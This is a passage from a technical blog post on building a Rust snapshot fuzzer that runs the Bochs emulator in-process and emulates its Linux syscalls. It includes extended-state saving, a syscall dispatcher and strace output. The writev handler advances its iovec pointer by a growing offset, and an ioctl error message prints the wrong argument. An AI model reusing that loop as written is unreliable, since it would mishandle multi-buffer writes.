            <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_xsave64</span><span class="p">(</span><span class="n">save_area</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">,</span> <span class="n">xcr0</span><span class="p">);</span> <span class="p">}</span>             
        <span class="p">},</span>
        <span class="nn">SaveInst</span><span class="p">::</span><span class="n">FxSave64</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Call fxsave to save the extended state to Bochs save area</span>
            <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_fxsave64</span><span class="p">(</span><span class="n">save_area</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">);</span> <span class="p">}</span>
        <span class="p">},</span>
        <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">(),</span> <span class="c1">// NoSave</span>
    <span class="p">}</span>

    <span class="c1">// Try to convert the exit reason into BochsExit</span>
    <span class="k">let</span> <span class="n">exit_reason</span> <span class="o">=</span> <span class="nn">BochsExit</span><span class="p">::</span><span class="nf">try_from</span><span class="p">(</span><span class="n">exit_reason</span><span class="p">);</span>
    <span class="k">if</span> <span class="n">exit_reason</span><span class="nf">.is_err</span><span class="p">()</span> <span class="p">{</span>
        <span class="nd">println!</span><span class="p">(</span><span class="s">"Invalid Bochs Exit Reason"</span><span class="p">);</span>
        <span class="nf">fatal_exit</span><span class="p">();</span>
    <span class="p">}</span>
    <span class="k">let</span> <span class="n">exit_reason</span> <span class="o">=</span> <span class="n">exit_reason</span><span class="nf">.unwrap</span><span class="p">();</span>
    
    <span class="c1">// Determine what to do based on the exit reason</span>
    <span class="k">match</span> <span class="n">exit_reason</span> <span class="p">{</span>
        <span class="nn">BochsExit</span><span class="p">::</span><span class="n">Syscall</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="nf">syscall_handler</span><span class="p">(</span><span class="n">context</span><span class="p">);</span>
        <span class="p">},</span>
    <span class="p">}</span>

    <span class="c1">// Restore extended state, determine restore logic</span>
    <span class="k">match</span> <span class="n">save_inst</span> <span class="p">{</span>
        <span class="nn">SaveInst</span><span class="p">::</span><span class="n">XSave64</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Retrieve XCR0 value, this will serve as our save mask</span>
            <span class="k">let</span> <span class="n">xcr0</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_xgetbv</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="p">}</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>

            <span class="c1">// Call xrstor to restore the extended state from Bochs save area</span>
            <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_xrstor64</span><span class="p">(</span><span class="n">save_area</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">,</span> <span class="n">xcr0</span><span class="p">);</span> <span class="p">}</span>             
        <span class="p">},</span>
        <span class="nn">SaveInst</span><span class="p">::</span><span class="n">FxSave64</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Call fxrstor to restore the extended state from Bochs save area</span>
            <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_fxrstor64</span><span class="p">(</span><span class="n">save_area</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">);</span> <span class="p">}</span>
        <span class="p">},</span>
        <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">(),</span> <span class="c1">// NoSave</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>There are a few important pieces here to discuss.</p>

<h2 id="extended-state">Extended State</h2>
<p>Let’s start with this concept of the save area. What is that? Well, we already have a general purpose registers saved and our CPU flags, but there is what’s called an “extended state” of the processor that we haven’t saved. This can include the floating-point registers, vector registers, and other state information used by the processor to support advanced execution features like SIMD (Single Instruction, Multiple Data) instructions, encryption, and other stuff like control registers. Is this important? It’s hard to say, we don’t know wtf Bochs will do, it might count on these to be preserved across function calls so I thought we’d go ahead and do it.</p>

<p>To save this state, you just execute the appropriate saving instruction for your CPU. To do this somewhat dynamically at runtime, I just query the processor for at least two saving instructions to see if they’re available, if they’re not, for now, we don’t support anything else. So when we create the execution context initially, we determine what save instruction we’ll need and store that answer in the execution context. Then on a context switch, we can dynamically use the approriate extended state saving function. This works because we don’t use any of the extended state in <code class="language-plaintext highlighter-rouge">lucid_handler</code> yet so it’s preserved still. You can see how I checked during context initialization here:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">pub</span> <span class="k">fn</span> <span class="nf">new</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="k">Self</span><span class="p">,</span> <span class="n">LucidErr</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="c1">// Check for what kind of features are supported we check from most </span>
        <span class="c1">// advanced to least</span>
        <span class="k">let</span> <span class="n">save_inst</span> <span class="o">=</span> <span class="k">if</span> <span class="nn">std</span><span class="p">::</span><span class="nd">is_x86_feature_detected!</span><span class="p">(</span><span class="s">"xsave"</span><span class="p">)</span> <span class="p">{</span>
            <span class="nn">SaveInst</span><span class="p">::</span><span class="n">XSave64</span>
        <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="nn">std</span><span class="p">::</span><span class="nd">is_x86_feature_detected!</span><span class="p">(</span><span class="s">"fxsr"</span><span class="p">)</span> <span class="p">{</span>
            <span class="nn">SaveInst</span><span class="p">::</span><span class="n">FxSave64</span>
        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
            <span class="nn">SaveInst</span><span class="p">::</span><span class="n">NoSave</span>
        <span class="p">};</span>

        <span class="c1">// Get save area size</span>
        <span class="k">let</span> <span class="n">save_size</span><span class="p">:</span> <span class="nb">usize</span> <span class="o">=</span> <span class="k">match</span> <span class="n">save_inst</span> <span class="p">{</span>
            <span class="nn">SaveInst</span><span class="p">::</span><span class="n">NoSave</span> <span class="k">=&gt;</span> <span class="mi">0</span><span class="p">,</span>
            <span class="n">_</span> <span class="k">=&gt;</span> <span class="nf">calc_save_size</span><span class="p">(),</span>
        <span class="p">};</span>
</code></pre></div></div>

<p>The way this works is the processor takes a pointer to memory where you want it saved and also how much you want saved, like what specific states. I just maxed out the amount of state I want saved and asked the CPU how much memory that would be:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Standalone function to calculate the size of the save area for saving the </span>
<span class="c1">// extended processor state based on the current processor's features. `cpuid` </span>
<span class="c1">// will return the save area size based on the value of the XCR0 when ECX==0</span>
<span class="c1">// and EAX==0xD. The value returned to EBX is based on the current features</span>
<span class="c1">// enabled in XCR0, while the value returned in ECX is the largest size it</span>
<span class="c1">// could be based on CPU capabilities. So out of an abundance of caution we use</span>
<span class="c1">// the ECX value. We have to preserve EBX or rustc gets angry at us. We are</span>
<span class="c1">// assuming that the fuzzer and Bochs do not modify the XCR0 at any time.  </span>
<span class="k">fn</span> <span class="nf">calc_save_size</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">usize</span> <span class="p">{</span>
    <span class="k">let</span> <span class="n">save</span><span class="p">:</span> <span class="nb">usize</span><span class="p">;</span>
    <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nd">asm!</span><span class="p">(</span>
            <span class="s">"push rbx"</span><span class="p">,</span>
            <span class="s">"mov rax, 0xD"</span><span class="p">,</span>
            <span class="s">"xor rcx, rcx"</span><span class="p">,</span>
            <span class="s">"cpuid"</span><span class="p">,</span>
            <span class="s">"pop rbx"</span><span class="p">,</span>
            <span class="nf">out</span><span class="p">(</span><span class="s">"rax"</span><span class="p">)</span> <span class="n">_</span><span class="p">,</span>       <span class="c1">// Clobber</span>
            <span class="nf">out</span><span class="p">(</span><span class="s">"rcx"</span><span class="p">)</span> <span class="n">save</span><span class="p">,</span>    <span class="c1">// Save the max size</span>
            <span class="nf">out</span><span class="p">(</span><span class="s">"rdx"</span><span class="p">)</span> <span class="n">_</span><span class="p">,</span>       <span class="c1">// Clobbered by CPUID output (w eax)</span>
        <span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Round up to the nearest page size</span>
    <span class="p">(</span><span class="n">save</span> <span class="o">+</span> <span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">&amp;</span> <span class="o">!</span><span class="p">(</span><span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<p>I page align the result and then map that memory during execution context initialization and save the memory address to the execution state. Now at run time in <code class="language-plaintext highlighter-rouge">lucid_handler</code> we can save the extended state:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Determine save logic</span>
    <span class="k">match</span> <span class="n">save_inst</span> <span class="p">{</span>
        <span class="nn">SaveInst</span><span class="p">::</span><span class="n">XSave64</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Retrieve XCR0 value, this will serve as our save mask</span>
            <span class="k">let</span> <span class="n">xcr0</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_xgetbv</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="p">}</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>

            <span class="c1">// Call xsave to save the extended state to Bochs save area</span>
            <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_xsave64</span><span class="p">(</span><span class="n">save_area</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">,</span> <span class="n">xcr0</span><span class="p">);</span> <span class="p">}</span>             
        <span class="p">},</span>
        <span class="nn">SaveInst</span><span class="p">::</span><span class="n">FxSave64</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Call fxsave to save the extended state to Bochs save area</span>
            <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_fxsave64</span><span class="p">(</span><span class="n">save_area</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">);</span> <span class="p">}</span>
        <span class="p">},</span>
        <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">(),</span> <span class="c1">// NoSave</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>Right now, all we’re handling for exit reasons are syscalls, so we invoke our syscall handler and then restore the extended state before returning back to the <code class="language-plaintext highlighter-rouge">exit_handler</code> assembly stub:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Determine what to do based on the exit reason</span>
    <span class="k">match</span> <span class="n">exit_reason</span> <span class="p">{</span>
        <span class="nn">BochsExit</span><span class="p">::</span><span class="n">Syscall</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="nf">syscall_handler</span><span class="p">(</span><span class="n">context</span><span class="p">);</span>
        <span class="p">},</span>
    <span class="p">}</span>

    <span class="c1">// Restore extended state, determine restore logic</span>
    <span class="k">match</span> <span class="n">save_inst</span> <span class="p">{</span>
        <span class="nn">SaveInst</span><span class="p">::</span><span class="n">XSave64</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Retrieve XCR0 value, this will serve as our save mask</span>
            <span class="k">let</span> <span class="n">xcr0</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_xgetbv</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="p">}</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>

            <span class="c1">// Call xrstor to restore the extended state from Bochs save area</span>
            <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_xrstor64</span><span class="p">(</span><span class="n">save_area</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">,</span> <span class="n">xcr0</span><span class="p">);</span> <span class="p">}</span>             
        <span class="p">},</span>
        <span class="nn">SaveInst</span><span class="p">::</span><span class="n">FxSave64</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Call fxrstor to restore the extended state from Bochs save area</span>
            <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_fxrstor64</span><span class="p">(</span><span class="n">save_area</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">);</span> <span class="p">}</span>
        <span class="p">},</span>
        <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">(),</span> <span class="c1">// NoSave</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>Let’s see how we handle syscalls.</p>

<h2 id="implementing-syscalls">Implementing Syscalls</h2>
<p>When we run the test program normally, not under Lucid, we get the following output:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">Argument count: 1
Args:
   -./test
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
g_lucid_ctx: 0
</span></code></pre></div></div>

<p>And when we run it with <code class="language-plaintext highlighter-rouge">strace</code>, we can see what syscalls are made:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">execve("./test", ["./test"], 0x7ffca76fee90 /* 49 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd53887f5b8) = 0
set_tid_address(0x7fd53887f7a8)         = 850649
ioctl(1, TIOCGWINSZ, {ws_row=40, ws_col=110, ws_xpixel=0, ws_ypixel=0}) = 0
writev(1, [{iov_base="Argument count: 1", iov_len=17}, {iov_base="\n", iov_len=1}], 2Argument count: 1
) = 18
writev(1, [{iov_base="Args:", iov_len=5}, {iov_base="\n", iov_len=1}], 2Args:
) = 6
writev(1, [{iov_base="   -./test", iov_len=10}, {iov_base="\n", iov_len=1}], 2   -./test
) = 11
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="g_lucid_ctx: 0", iov_len=14}, {iov_base="\n", iov_len=1}], 2g_lucid_ctx: 0
) = 15
exit_group(0)                           = ?
+++ exited with 0 +++
</span></code></pre></div></div>

<p>We see that the first two syscalls are involved with process creation, we don’t need to worry about those our process is already created and loaded in memory. The other syscalls are ones we’ll need to handle, things like <code class="language-plaintext highlighter-rouge">set_tid_address</code>, <code class="language-plaintext highlighter-rouge">ioctl</code>, and <code class="language-plaintext highlighter-rouge">writev</code>. We don’t worry about <code class="language-plaintext highlighter-rouge">exit_group</code> yet as that will be a fatal exit condition because Bochs shouldn’t exit if we’re snapshot fuzzing.</p>

<p>So we can use our saved register bank information to extract the syscall number from <code class="language-plaintext highlighter-rouge">eax</code> and dispatch to the appropriate syscall function! You can see that logic here:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// This is where we process Bochs making a syscall. All we need is a pointer to</span>
<span class="c1">// the execution context, and we can then access the register bank and all the</span>
<span class="c1">// peripheral structures we need</span>
<span class="nd">#[allow(unused_variables)]</span>
<span class="k">pub</span> <span class="k">fn</span> <span class="nf">syscall_handler</span><span class="p">(</span><span class="n">context</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">LucidContext</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Get a handle to the register bank</span>
    <span class="k">let</span> <span class="n">bank</span> <span class="o">=</span> <span class="nn">LucidContext</span><span class="p">::</span><span class="nf">get_register_bank</span><span class="p">(</span><span class="n">context</span><span class="p">);</span>

    <span class="c1">// Check what the syscall number is</span>
    <span class="k">let</span> <span class="n">syscall_no</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.rax</span><span class="p">;</span>

    <span class="c1">// Get the syscall arguments</span>
    <span class="k">let</span> <span class="n">arg1</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.rdi</span><span class="p">;</span>
    <span class="k">let</span> <span class="n">arg2</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.rsi</span><span class="p">;</span>
    <span class="k">let</span> <span class="n">arg3</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.rdx</span><span class="p">;</span>
    <span class="k">let</span> <span class="n">arg4</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.r10</span><span class="p">;</span>
    <span class="k">let</span> <span class="n">arg5</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.r8</span><span class="p">;</span>
    <span class="k">let</span> <span class="n">arg6</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.r9</span><span class="p">;</span>

    <span class="k">match</span> <span class="n">syscall_no</span> <span class="p">{</span>
        <span class="c1">// ioctl</span>
        <span class="mi">0x10</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">//println!("Handling ioctl()...");</span>
            <span class="c1">// Make sure the fd is 1, that's all we handle right now?</span>
            <span class="k">if</span> <span class="n">arg1</span> <span class="o">!=</span> <span class="mi">1</span> <span class="p">{</span>
                <span class="nd">println!</span><span class="p">(</span><span class="s">"Invalid `ioctl` fd: {}"</span><span class="p">,</span> <span class="n">arg1</span><span class="p">);</span>
                <span class="nf">fatal_exit</span><span class="p">();</span>
            <span class="p">}</span>

            <span class="c1">// Check the `cmd` argument</span>
            <span class="k">match</span> <span class="n">arg2</span> <span class="k">as</span> <span class="nb">u64</span> <span class="p">{</span>
                <span class="c1">// Requesting window size</span>
                <span class="nn">libc</span><span class="p">::</span><span class="n">TIOCGWINSZ</span> <span class="k">=&gt;</span> <span class="p">{</span>   
                    <span class="c1">// Arg 3 is a pointer to a struct winsize</span>
                    <span class="k">let</span> <span class="n">winsize_p</span> <span class="o">=</span> <span class="n">arg3</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nn">libc</span><span class="p">::</span><span class="n">winsize</span><span class="p">;</span>

                    <span class="c1">// If it's NULL, return an error, we don't set errno yet</span>
                    <span class="c1">// that's a weird problem</span>
                    <span class="c1">// TODO: figure out that whole TLS issue yikes</span>
                    <span class="k">if</span> <span class="n">winsize_p</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span>
                        <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.rax</span> <span class="o">=</span> <span class="nn">usize</span><span class="p">::</span><span class="n">MAX</span><span class="p">;</span>
                        <span class="k">return</span><span class="p">;</span>
                    <span class="p">}</span>

                    <span class="c1">// Deref the raw pointer</span>
                    <span class="k">let</span> <span class="n">winsize</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="o">*</span><span class="n">winsize_p</span> <span class="p">};</span>

                    <span class="c1">// Set to some constants</span>
                    <span class="n">winsize</span><span class="py">.ws_row</span>      <span class="o">=</span> <span class="n">WS_ROW</span><span class="p">;</span>
                    <span class="n">winsize</span><span class="py">.ws_col</span>      <span class="o">=</span> <span class="n">WS_COL</span><span class="p">;</span>
                    <span class="n">winsize</span><span class="py">.ws_xpixel</span>   <span class="o">=</span> <span class="n">WS_XPIXEL</span><span class="p">;</span>
                    <span class="n">winsize</span><span class="py">.ws_ypixel</span>   <span class="o">=</span> <span class="n">WS_YPIXEL</span><span class="p">;</span>

                    <span class="c1">// Return success</span>
                    <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.rax</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
                <span class="p">},</span>
                <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">{</span>
                    <span class="nd">println!</span><span class="p">(</span><span class="s">"Unhandled `ioctl` argument: 0x{:X}"</span><span class="p">,</span> <span class="n">arg1</span><span class="p">);</span>
                    <span class="nf">fatal_exit</span><span class="p">();</span>
                <span class="p">}</span>
            <span class="p">}</span>
        <span class="p">},</span>
        <span class="c1">// writev</span>
        <span class="mi">0x14</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">//println!("Handling writev()...");</span>
            <span class="c1">// Get the fd</span>
            <span class="k">let</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">arg1</span> <span class="k">as</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">c_int</span><span class="p">;</span>

            <span class="c1">// Make sure it's an fd we handle</span>
            <span class="k">if</span> <span class="n">fd</span> <span class="o">!=</span> <span class="n">STDOUT</span> <span class="p">{</span>
                <span class="nd">println!</span><span class="p">(</span><span class="s">"Unhandled writev fd: {}"</span><span class="p">,</span> <span class="n">fd</span><span class="p">);</span>
            <span class="p">}</span>

            <span class="c1">// An accumulator that we return</span>
            <span class="k">let</span> <span class="k">mut</span> <span class="n">bytes_written</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

            <span class="c1">// Get the iovec count</span>
            <span class="k">let</span> <span class="n">iovcnt</span> <span class="o">=</span> <span class="n">arg3</span> <span class="k">as</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">c_int</span><span class="p">;</span>

            <span class="c1">// Get the pointer to the iovec</span>
            <span class="k">let</span> <span class="k">mut</span> <span class="n">iovec_p</span> <span class="o">=</span> <span class="n">arg2</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nn">libc</span><span class="p">::</span><span class="n">iovec</span><span class="p">;</span>

            <span class="c1">// If the pointer was NULL, just return error</span>
            <span class="k">if</span> <span class="n">iovec_p</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span>
                <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.rax</span> <span class="o">=</span> <span class="nn">usize</span><span class="p">::</span><span class="n">MAX</span><span class="p">;</span>
                <span class="k">return</span><span class="p">;</span>
            <span class="p">}</span>

            <span class="c1">// Iterate through the iovecs and write the contents</span>
            <span class="nd">green!</span><span class="p">();</span>
            <span class="k">for</span> <span class="n">i</span> <span class="k">in</span> <span class="mi">0</span><span class="o">..</span><span class="n">iovcnt</span> <span class="p">{</span>
                <span class="n">bytes_written</span> <span class="o">+=</span> <span class="nf">write_iovec</span><span class="p">(</span><span class="n">iovec_p</span><span class="p">);</span>

                <span class="c1">// Update iovec_p</span>
                <span class="n">iovec_p</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="n">iovec_p</span><span class="nf">.offset</span><span class="p">(</span><span class="mi">1</span> <span class="o">+</span> <span class="n">i</span> <span class="k">as</span> <span class="nb">isize</span><span class="p">)</span> <span class="p">};</span>
            <span class="p">}</span>
            <span class="nd">clear!</span><span class="p">();</span>

            <span class="c1">// Update return value</span>
            <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.rax</span> <span class="o">=</span> <span class="n">bytes_written</span><span class="p">;</span>
        <span class="p">},</span>
        <span class="c1">// nanosleep</span>
        <span class="mi">0x23</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">//println!("Handling nanosleep()...");</span>
            <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.rax</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="p">},</span>
        <span class="c1">// set_tid_address</span>
        <span class="mi">0xDA</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">//println!("Handling set_tid_address()...");</span>
            <span class="c1">// Just return Boch's pid, no need to do anything</span>
            <span class="p">(</span><span class="o">*</span><span class="n">bank</span><span class="p">)</span><span class="py">.rax</span> <span class="o">=</span> <span class="n">BOCHS_PID</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">;</span>
        <span class="p">},</span>
        <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="nd">println!</span><span class="p">(</span><span class="s">"Unhandled Syscall Number: 0x{:X}"</span><span class="p">,</span> <span class="n">syscall_no</span><span class="p">);</span>
            <span class="nf">fatal_exit</span><span class="p">();</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>That’s about it! It’s kind of fun acting as the kernel. Right now our test program doesn’t do much, but I bet we’re going to have to figure out how to deal with things like files and such when using Bochs, but that’s a different time. Now all there is to do, after setting the return code via <code class="language-plaintext highlighter-rouge">rax</code>, is return back to the <code class="language-plaintext highlighter-rouge">exit_handler</code> stub and back to Bochs gracefully.</p>

<h2 id="returning-gracefully">Returning Gracefully</h2>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="c1">// Restore the flags</span>
    <span class="s">"popfq"</span><span class="p">,</span>

    <span class="c1">// Restore the GPRS</span>
    <span class="s">"mov rax, [r13 + 0x0]"</span><span class="p">,</span>
    <span class="s">"mov rbx, [r13 + 0x8]"</span><span class="p">,</span>
    <span class="s">"mov rcx, [r13 + 0x10]"</span><span class="p">,</span>
    <span class="s">"mov rdx, [r13 + 0x18]"</span><span class="p">,</span>
    <span class="s">"mov rsi, [r13 + 0x20]"</span><span class="p">,</span>
    <span class="s">"mov rdi, [r13 + 0x28]"</span><span class="p">,</span>
    <span class="s">"mov rbp, [r13 + 0x30]"</span><span class="p">,</span>
    <span class="s">"mov rsp, [r13 + 0x38]"</span><span class="p">,</span>
    <span class="s">"mov r8, [r13 + 0x40]"</span><span class="p">,</span>
    <span class="s">"mov r9, [r13 + 0x48]"</span><span class="p">,</span>
    <span class="s">"mov r10, [r13 + 0x50]"</span><span class="p">,</span>
    <span class="s">"mov r11, [r13 + 0x58]"</span><span class="p">,</span>
    <span class="s">"mov r12, [r13 + 0x60]"</span><span class="p">,</span>
    <span class="s">"mov r13, [r13 + 0x68]"</span><span class="p">,</span>
    <span class="s">"mov r14, [r13 + 0x70]"</span><span class="p">,</span>
    <span class="s">"mov r15, [r13 + 0x78]"</span><span class="p">,</span>

    <span class="c1">// Return execution back to Bochs!</span>
    <span class="s">"ret"</span>
</code></pre></div></div>

<p>We restore the CPU flags, restore the general purpose registers, and then we simple <code class="language-plaintext highlighter-rouge">ret</code> like we’re done with the function call. Don’t forget we already restored the extended state before within <code class="language-plaintext highlighter-rouge">lucid_context</code> before returning from that function.</p>

<h2 id="conclusion">Conclusion</h2>
<p>And just like that, we have an infrastructure that is capable of handling context switches from Bochs to the fuzzer. It will no doubt change and need to be refactored, but the ideas will remain similar. We can see the output below demonstrates the test program running under Lucid with us handling the syscalls ourselves:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">[08:15:56] lucid&gt;</span><span class="w"> </span>Loading Bochs...
<span class="gp">[08:15:56] lucid&gt;</span><span class="w"> </span>Bochs mapping: 0x10000 - 0x18000
<span class="gp">[08:15:56] lucid&gt;</span><span class="w"> </span>Bochs mapping size: 0x8000
<span class="gp">[08:15:56] lucid&gt;</span><span class="w"> </span>Bochs stack: 0x7F8A50FCF000
<span class="gp">[08:15:56] lucid&gt;</span><span class="w"> </span>Bochs entry: 0x11058
<span class="gp">[08:15:56] lucid&gt;</span><span class="w"> </span>Creating Bochs execution context...
<span class="gp">[08:15:56] lucid&gt;</span><span class="w"> </span>Starting Bochs...
<span class="go">Argument count: 4
Args:
   -./bochs
   -lmfao
   -hahahah
   -yes!
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
g_lucid_ctx: 0x55f27f693cd0
Unhandled Syscall Number: 0xE7
</span></code></pre></div></div>

<h2 id="next-up">Next Up?</h2>
<p>Next we will compile Bochs against Musl and work on getting it to work. We’ll need to implement all of its syscalls as well as get it running a test target that we’ll want to snapshot and run over and over. So the next blogpost should be a Bochs that is syscall-sandboxed snapshotting and rerunning a hello world type target. Until then!</p>]]></content><author><name></name></author><category term="Fuzzing" /><category term="Fuzzer" /><category term="Development" /><category term="Emulator" /><category term="Bochs" /><summary type="html"><![CDATA[Introduction If you haven’t heard, we’re developing a fuzzer on the blog these days. I don’t even know if “fuzzer” is the right word for what we’re building, it’s almost more like an execution engine that will expose hooks? Anyways, if you missed the first episode you can catch up here. We are creating a fuzzer that loads a statically built Bochs emulator into itself, and executes Bochs logic while maintaining a sandbox for Bochs. You can think of it as, we were too lazy to implement our own x86_64 emulator from scratch so we’ve just literally taken a complete emulator and stuffed it into our own process to use it. The fuzzer is written in Rust and Bochs is a C++ codebase. Bochs is a full system emulator, so the devices and everything else is just simulated in software. This is great for us because we can simply snapshot and restore Bochs itself to achieve snapshot fuzzing of our target. So the fuzzer runs Bochs and Bochs runs our target. This allows us to snapshot fuzz arbitrarily complex targets: web browsers, kernels, network stacks, etc. This episode, we’ll delve into the concept of sandboxing Bochs from syscalls. We do not want Bochs to be capable of escaping its sandbox or retrieving any data from outside of our environment. So today we’ll get into the implementation details of my first stab at Bochs-to-fuzzer context switching to handle syscalls. In the future we 